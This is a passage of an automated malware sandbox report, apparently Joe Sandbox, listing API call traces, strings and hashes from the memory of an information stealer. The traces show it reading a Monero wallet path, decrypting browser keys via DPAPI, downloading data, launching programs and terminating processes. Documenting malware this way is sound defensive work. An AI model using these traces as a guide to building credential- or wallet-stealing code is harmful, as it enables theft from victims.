                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 2500673778-0
                                                    • Opcode ID: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
                                                    • Instruction ID: 89ad621ca994d70ee94c8a7bc22ed364f9ce59c214b18cb1d7d4fe494eaf33eb
                                                    • Opcode Fuzzy Hash: 429597e02848e73d099179173949805f0ac9f6d10f8d92198f539ea29d3a57b6
                                                    • Instruction Fuzzy Hash: 58A15E70A112459FCB25FF69C888AAE77F2AF45309F14846BE809D7361DB75D842CF60
                                                    APIs
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C8F2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C91B
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0249C97B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                    • String ID: (QC$.dll$<$XTC$\TC
                                                    • API String ID: 3031569214-1251744519
                                                    • Opcode ID: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
                                                    • Instruction ID: 435cac6065180e3b9173e057f7ab79516f451fec62e66aad731265620a19839e
                                                    • Opcode Fuzzy Hash: 78a51166efe7744123a507f86fef9074274627cecf28876ae91ec9f88b78fd30
                                                    • Instruction Fuzzy Hash: EE512C719112999FCF20FF79C88499DBBB2AF48309F55487ED909AB610EB349D86CF40
                                                    APIs
                                                    • memcmp.MSVCRT(?,v20,00000003), ref: 00409E64
                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 00409EA2
                                                    • memset.MSVCRT ref: 00409ECF
                                                    • LocalAlloc.KERNEL32(00000040), ref: 00409F07
                                                      • Part of subcall function 00427210: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042722E
                                                    • lstrcpy.KERNEL32(00000000,0043520C), ref: 0040A012
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpymemcmp$AllocLocalmemset
                                                    • String ID: @$v10$v20
                                                    • API String ID: 3420379846-278772428
                                                    • Opcode ID: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                    • Instruction ID: 83ac3224cdaa42a2a44bfc4cbeb411fde6a44a78649a1401cb5d7513f19e7b50
                                                    • Opcode Fuzzy Hash: 330cae58e6688a2e98774f110046c80a2aac67dd83a01ba16a53f72088a13564
                                                    • Instruction Fuzzy Hash: F9519D71A002199BDB10EF65DC45B9F77A4AF04318F14407AF949BB2D2DBB8ED058BD8
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E3F6
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249E404
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E41F
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E433
                                                    • lstrcat.KERNEL32(?,00638A84), ref: 0249E447
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E45B
                                                    • lstrcat.KERNEL32(?,00638AC8), ref: 0249E46E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E4A6
                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0249E4AD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                                    • String ID:
                                                    • API String ID: 3428472996-0
                                                    • Opcode ID: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
                                                    • Instruction ID: f712e01e8a83a121e58482bc22ea9b72c520fca4cd8d826cb5c1cc11bf78f05b
                                                    • Opcode Fuzzy Hash: 55c52c1f62f8efd274b96c816be001393c03f7b4ce265de6d3a978105c0cffea
                                                    • Instruction Fuzzy Hash: 4E4183B1911168ABCF15EF74CC44ADD7BB6AF48300F1489AAE94993250DBB49F85CF90
                                                    APIs
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C736
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C75F
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0249C7CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                    • String ID: "" $(QC$(QC$<
                                                    • API String ID: 3031569214-2404812987
                                                    • Opcode ID: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                    • Instruction ID: 1797442869dc3fdf1030befe572da53f52d43be0f8804d0cc7d2eb34fb34d2a9
                                                    • Opcode Fuzzy Hash: 8cc24b7e80201b832584fbae0ea064460c96b0f159e9a026d4ea583a74e4237f
                                                    • Instruction Fuzzy Hash: B2513C719112999BCB20FF79D8C499DBBB2AF48308F1548BFD805AB611EB349D46CF80
                                                    APIs
                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 024A2982
                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,0249967D,00000000,00000000,00000000,00000000), ref: 024A29B3
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024A2A16
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2A1D
                                                    • wsprintfA.USER32 ref: 024A2A42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                                    • String ID: :\$C
                                                    • API String ID: 2572753744-3309953409
                                                    • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction ID: ebac442d2ab939e29c851120b3724318c7ba195a4c4b8bd69011db540edda4e8
                                                    • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                    • Instruction Fuzzy Hash: A53170B1D082499FCB14CFA88994AEEFFBDFB58740F00416EE505E7650E3748B408BA1
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040101C
                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
                                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                    Strings
                                                    • SOFTWARE\monero-project\monero-core, xrefs: 0040102F
                                                    • wallet_path, xrefs: 0040104D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                    • API String ID: 3466090806-4244082812
                                                    • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
                                                    • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                    • Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0
                                                    APIs
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02489376
                                                    • InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 02489393
                                                    • InternetCloseHandle.WININET(00000000), ref: 024893A0
                                                      • Part of subcall function 02498117: memchr.MSVCRT ref: 02498156
                                                      • Part of subcall function 02498117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 02498170
                                                      • Part of subcall function 02498117: memchr.MSVCRT ref: 0249818F
                                                      • Part of subcall function 02488C17: std::_Xinvalid_argument.LIBCPMT ref: 02488C2D
                                                    • strlen.MSVCRT ref: 024893BC
                                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 024893FD
                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 0248942E
                                                    • InternetCloseHandle.WININET(00000000), ref: 02489439
                                                    • InternetCloseHandle.WININET(00000000), ref: 02489440
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
                                                    • String ID:
                                                    • API String ID: 1093921401-0
                                                    • Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
                                                    • Instruction ID: ca02488f5bf2fc89a0f6a408bc624c6e44ae974f29a7809d8d63ac3f7a2036c8
                                                    • Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
                                                    • Instruction Fuzzy Hash: F551D471A00204ABDB20DFA8DC45FEEF7F9DB48714F14012AE505E3380DBB4DA459BA5
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00424789
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
                                                    • CloseHandle.KERNEL32(00000000), ref: 004247D2
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
                                                    • CloseHandle.KERNEL32(00000000), ref: 004247EB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                    • String ID:
                                                    • API String ID: 3836391474-0
                                                    • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                    • Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
                                                    • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                    • Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB2A
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB5C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBAB
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBD1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EC09
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0248EC3F
                                                    • FindClose.KERNEL32(00000000), ref: 0248EC4E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$CloseFileNext
                                                    • String ID:
                                                    • API String ID: 1875835556-0
                                                    • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction ID: 42c41d695748a93f4e358332baf0f22026bd24576ae896dcd7984789a4d128ac
                                                    • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction Fuzzy Hash: 5E02FD71B212128FDB28DF19C548B6AB7E5AF44718F19C1AEE809DB3A1D772D842CF50
                                                    APIs
                                                    • strlen.MSVCRT ref: 024A238A
                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,024A2686,00000000,00000000,00000000), ref: 024A23B8
                                                    • VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 024A2408
                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 024A2469
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MemoryProcessQueryReadVirtualstrlen
                                                    • String ID:
                                                    • API String ID: 3366127311-0
                                                    • Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
                                                    • Instruction ID: 9424dfa99a28cb65d3e70d117b6d576c28c3367395eff5b9523c842621dd606f
                                                    • Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
                                                    • Instruction Fuzzy Hash: 3671E271A001199BDB24CFA8DD64AAFB7B6FB98710F14812AFD05E7380D774DD419BA0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 0040717E
                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004071C0
                                                    • memcpy.MSVCRT(00000000,?), ref: 004071ED
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
                                                    • HeapFree.KERNEL32(00000000), ref: 0040720A
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00407269
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                                    • String ID:
                                                    • API String ID: 1745114167-0
                                                    • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
                                                    • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 024873E5
                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02487420
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02487427
                                                    • memcpy.MSVCRT(00000000,?), ref: 02487454
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0248746A
                                                    • HeapFree.KERNEL32(00000000), ref: 02487471
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 024874D0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
                                                    • String ID:
                                                    • API String ID: 413393563-0
                                                    • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction ID: f0c65cd217579a0264572e6c5cf3d8a51ceed3bbf1b467fd7017a3b8af5e8396
                                                    • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction Fuzzy Hash: 92418E75B106059BD720DFA9EC947AAF7E9EB84309F2445AAE84DC7310E771E800CBA0
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 00409D08
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
                                                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocLocallstrcpymemcmp
                                                    • String ID: $"encrypted_key":"$DPAPI
                                                    • API String ID: 4154055062-738592651
                                                    • Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                    • Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
                                                    • Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                    • Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00417F84
                                                    • lstrlenA.KERNEL32(00000000), ref: 00417FB1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
                                                    • strtok_s.MSVCRT ref: 00417FF1
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok_s$lstrcpylstrlen
                                                    • String ID:
                                                    • API String ID: 348468850-0
                                                    • Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                    • Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
                                                    • Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                    • Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 0249836C
                                                    • lstrlen.KERNEL32(00000000), ref: 024983B2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024983E1
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 024983F9
                                                    • lstrlen.KERNEL32(00000000), ref: 02498437
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02498466
                                                    • strtok_s.MSVCRT ref: 02498476
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlenstrtok_s
                                                    • String ID:
                                                    • API String ID: 3280532728-0
                                                    • Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
                                                    • Instruction ID: 87d07580f7f0fafca4152219f815aa45909065b9492f755a7f5328d8e7748008
                                                    • Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
                                                    • Instruction Fuzzy Hash: FD4167716002069FDB21EF6CD988BAABBB5EF46704F00801EEC4A97245EB75D941CFA0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 024857F0
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024857F7
                                                    • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 0248580D
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 02485828
                                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 02485853
                                                    • InternetCloseHandle.WININET(?), ref: 02485892
                                                    • InternetCloseHandle.WININET(00000000), ref: 02485899
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                    • String ID:
                                                    • API String ID: 3066467675-0
                                                    • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction ID: 6892681158d36acd2f704ad99636c8af4466af256c37b0dc346e5b811b69bbd0
                                                    • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction Fuzzy Hash: BB417E70A00204AFDB24DF59DC48B9EB7F5FF48314F5580AAE9099B3A0D7B1A941CF94
                                                    APIs
                                                    • memset.MSVCRT ref: 024A47A1
                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,0249558F), ref: 024A47CC
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A47D3
                                                    • wsprintfW.USER32 ref: 024A47E2
                                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 024A4851
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 024A4860
                                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 024A4867
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                    • String ID:
                                                    • API String ID: 3729781310-0
                                                    • Opcode ID: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
                                                    • Instruction ID: fed3be049fa0549b6760c456ece26fa85a7a9ea14118540c800866eb32e70ebf
                                                    • Opcode Fuzzy Hash: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
